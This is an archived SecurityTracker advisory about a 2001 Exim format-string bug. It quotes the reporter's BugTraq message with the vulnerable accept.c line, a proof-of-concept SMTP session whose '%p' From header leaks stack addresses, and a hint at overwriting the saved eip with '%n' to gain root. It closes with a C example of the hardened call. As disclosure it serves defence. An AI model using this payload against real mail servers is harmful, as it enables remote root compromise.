SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
Category:  Application (E-mail Server) > Exim
Vendors:  Exim.org
Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
SecurityTracker Alert ID:  1001694
SecurityTracker URL:  http://securitytracker.com/id/1001694
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jun 6 2001
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  

Description:   A vulnerability has been reported in the Exim mail server that may allow a remote user to execute arbitrary code on the server.

It is reported that when Exim is configured to check incoming mail headers for proper syntax, the vulnerability can be triggered. This is configured through the /etc/exim.conf headers_check_syntax option. By default, this option is not set.

The vulnerability reportedly exists in the accept.c module, where smtp_reply (which embeds text taken from the incoming header) is passed to the moan_smtp_batch() function as its format string.

A demonstration exploit transcript is provided in the Source Message.

Impact:   A remote user can execute arbitrary code on the server with root-level privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.exim.org/
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Debian Releases Fix) Re: Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server   (Wichert Akkerman <wichert@cistron.nl>)
Debian has released a fix.
(Conectiva Issues Fix) Re: Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server   (secure@conectiva.com.br)
Conectiva has issued a fix.
(Red Hat Provides Fix) Re: Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server   (bugzilla@redhat.com)
Red Hat has provided a fix.



Source Message Contents

Date:  Wed, 6 Jun 2001 14:03:25 +0200
Subject:  lil' exim format bug


Hi BugTrackers

Just a little bug to tell:


THE BUG
-------

accept.c, line 2506:
	else if (smtp_reply != NULL) moan_smtp_batch(NULL, smtp_reply);

while moan_smtp_batch is like this:
	moan_smtp_batch(char *cmd_buffer, char *format, ...)

So when smtp_reply contains format strings, it gets transformed by
moan_smtp_batch().


Why did I say that it's a little bug?
-------------------------------------

This piece of code is only executed when exim is configured to check incoming mails' headers:
/etc/exim.conf should have an option set:
headers_check_syntax

By default it's turned OFF.
Only a few people turn it on.

So it's NOT vulnerable BY DEFAULT.


Exploitation:
-------------

Try this:
===8<======8<=======8<======
lez:~$ /usr/sbin/exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p

.
===8<======8<=======8<=======

Somewhere in the answers you should see:
550 Syntax error in 'From' header: domain missing or malformed: failing address is: @@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40

If you change the %p's to %s's, you get a segfault. With a carefully constructed thing, it's easy to overwrite the saved eip with %n's and get root out of this bug.

No exploit yet, but after the many local format bug exploits it's not a lot of work to write one for a skilled man.
-- 
Megyer Laszlo (Lez)
lez@sch.bme.hu
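The bug pattern described in the message above, as an added example that is not Exim's code: a hypothetical moan_smtp_batch() stand-in with the same printf-style second parameter, the vulnerable call that hands the 550 reply in as the format itself, and the hardened call that passes the reply through a constant "%s" format. The reply text is taken from the transcript above; the buffer parameters, build_syntax_reply() and reply_differs() are assumptions made for this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for moan_smtp_batch(): as in the quoted prototype,
 * the parameter after the buffer is a printf-style format string. */
static int moan_smtp_batch(char *out, size_t outlen, const char *format, ...)
{
    va_list ap;
    va_start(ap, format);
    int n = vsnprintf(out, outlen, format, ap);
    va_end(ap);
    return n;
}

/* Builds the 550 reply from the report. 'address' comes from the client's
 * From: header and may contain '%'; this step is safe (literal format). */
static void build_syntax_reply(char *reply, size_t len, const char *address)
{
    snprintf(reply, len, "550 Syntax error in 'From' header: domain missing "
             "or malformed: failing address is: %s", address);
}

/* Reported pattern: the reply, attacker text included, is the format itself,
 * so every '%' in the address is interpreted by vsnprintf(). */
int vulnerable_reply(char *out, size_t outlen, const char *address)
{
    char reply[256];
    build_syntax_reply(reply, sizeof reply, address);
    return moan_smtp_batch(out, outlen, reply);
}

/* Hardened pattern: constant "%s" format, reply passed as an argument,
 * so its '%' bytes are copied through untouched. */
int safe_reply(char *out, size_t outlen, const char *address)
{
    char reply[256];
    build_syntax_reply(reply, sizeof reply, address);
    return moan_smtp_batch(out, outlen, "%s", reply);
}

/* 1 when the two paths yield different text. Only "%%" is used as test input
 * (not %p/%s/%n) so the vulnerable path stays within defined behaviour. */
int reply_differs(const char *address)
{
    char a[512], b[512];
    vulnerable_reply(a, sizeof a, address);
    safe_reply(b, sizeof b, address);
    return strcmp(a, b) != 0;
}
```

With a constructed address of "@@100%%", the vulnerable path collapses the "%%" to a single "%" while the hardened path reproduces the header text exactly; a plain address such as "lez@lez" comes out identical on both paths.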


Copyright 2013, SecurityGlobal.net LLC